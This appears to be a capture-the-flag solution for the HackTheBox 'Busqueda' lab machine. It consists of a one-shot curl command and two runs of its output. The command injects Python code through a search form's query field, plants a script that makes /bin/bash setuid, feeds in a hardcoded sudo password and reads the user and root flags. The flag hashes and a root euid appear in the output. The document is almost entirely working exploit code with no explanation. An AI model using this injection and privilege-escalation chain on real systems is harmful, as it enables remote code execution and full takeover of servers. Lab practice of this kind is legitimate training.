HackTheBox Busqueda (EASY difficulty) in one shot

Run the sudo command automatically and feed it the sudo password automatically: jh1usoih2bkjaspwe92

curl -v -d "engine=Accuweather&query=1'%2bprint(eval(__import__('os').system('tac /home/svc/user.txt;cd /tmp;echo \"#\x21/bin/bash\nchmod %2bs /bin/bash\">full-checkup.sh;chmod %2bx full-checkup.sh;tac full*;(echo sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup;sleep 0.2;echo jh1usoih2bkjaspwe92)|script nz7;bash -pc \"tac /root/root.txt;id\"')))%2b'" -H "Host: searcher.htb" http://10.10.11.208/search

root@fv-az455-564:/tmp# curl -v -d "engine=Accuweather&query=1'%2bprint(eval(__import__('os').system('tac /home/svc/user.txt;cd /tmp;echo chmod %2bs /bin/bash>full-checkup.sh;chmod %2bx full-checkup.sh;cat full*;(echo sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup;sleep 0.2;echo jh1usoih2bkjaspwe92)|script nz7;bash -pc \"tac /root/root.txt;id\"')))%2b'" -H "Host: searcher.htb" http://10.10.11.208/search
*   Trying 10.10.11.208:80...
* Connected to 10.10.11.208 (10.10.11.208) port 80 (#0)
> POST /search HTTP/1.1
> Host: searcher.htb
> User-Agent: curl/7.81.0
> Accept: */*
> Content-Length: 335
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 23 Apr 2023 14:10:42 GMT
< Server: Werkzeug/2.1.2 Python/3.10.6
< Content-Type: text/html; charset=utf-8
< Content-Length: 330
< Vary: Accept-Encoding
< 
07925555dcb0a45846a46b19d0d0e7c6
chmod +s /bin/bash
Script started, output log file is 'nz7'.
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
$ [sudo] password for svc: 
Something went wrong
$ 
Script done.
6dd6c4de6c7e05fa4078393b510f4630
* Connection #0 to host 10.10.11.208 left intact
uid=1000(svc) gid=1000(svc) euid=0(root) egid=0(root) groups=0(root)root@fv-az455-564:/tmp# 

root@fv-az455-564:/tmp# curl -v -d "engine=Accuweather&query=1'%2bprint(eval(__import__('os').system('tac /home/svc/user.txt;cd /tmp;echo \"#\x21/bin/bash\nchmod %2bs /bin/bash\">full-checkup.sh;chmod %2bx full-checkup.sh;tac full*;(echo sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup;sleep 0.2;echo jh1usoih2bkjaspwe92)|script nz7;bash -p -c \"tac /root/root.txt;id\"')))%2b'" -H "Host: searcher.htb" http://10.10.11.208/search
*   Trying 10.10.11.208:80...
* Connected to 10.10.11.208 (10.10.11.208) port 80 (#0)
> POST /search HTTP/1.1
> Host: searcher.htb
> User-Agent: curl/7.81.0
> Accept: */*
> Content-Length: 355
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 23 Apr 2023 14:37:06 GMT
< Server: Werkzeug/2.1.2 Python/3.10.6
< Content-Type: text/html; charset=utf-8
< Content-Length: 333
< Vary: Accept-Encoding
< 
4c1eba893e8a8a789221f03c11979c2e
chmod +s /bin/bash
#!/bin/bash
Script started, output log file is 'nz7'.
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
$ [sudo] password for svc: 

[+] Done!
$ 
Script done.
23bc68920b590506f48179a045787748
* Connection #0 to host 10.10.11.208 left intact
uid=1000(svc) gid=1000(svc) euid=0(root) egid=0(root) groups=0(root)root@fv-az455-564:/tmp# 
